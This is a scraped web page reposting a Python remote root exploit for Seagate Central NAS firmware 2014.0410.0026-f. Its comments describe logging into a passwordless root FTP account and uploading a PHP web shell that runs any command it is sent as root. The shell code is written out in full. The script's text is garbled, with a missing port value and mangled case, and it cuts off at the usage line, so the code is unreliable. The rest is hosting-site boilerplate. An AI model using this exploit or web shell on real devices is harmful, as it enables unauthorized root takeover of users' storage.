Seagate 2014.0410.0026-f Remote Root Exploit

Source: Internet
Author: User
#!/usr/bin/python # seagate_ftp_remote_root.py # seagate remote Root exploit # Jeremy Brown [Jbrown3264/gmail]
# May 2015 # #-synopsis-# # Seagate-by-default has a passwordless root account (and no option to change it).
# One way to exploit it's to log into it's FTP server and upload a php shell to the Webroot.
# From there, we can execute commands with root privileges as LIGHTTPD is also running as root.
# #-fixes-# # Seagate scheduled it ' s updates to go live on April 28th, 2015. # # tested Firmware version:2014.0410.0026-f # import sys from ftplib import FTP port = Php_shell = "" "<?php If
(Isset ($_request[' cmd '))
    {$cmd = ($_request["cmd"]);
    echo "<pre> $cmd </pre>";
System ($CMD); }?> "" "Php_shell_filename =" shell.php "seagate_central_webroot ="/cirrus/"def Main (): if (len (SYS.ARGV) < 2): Print ("Usage:%s 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.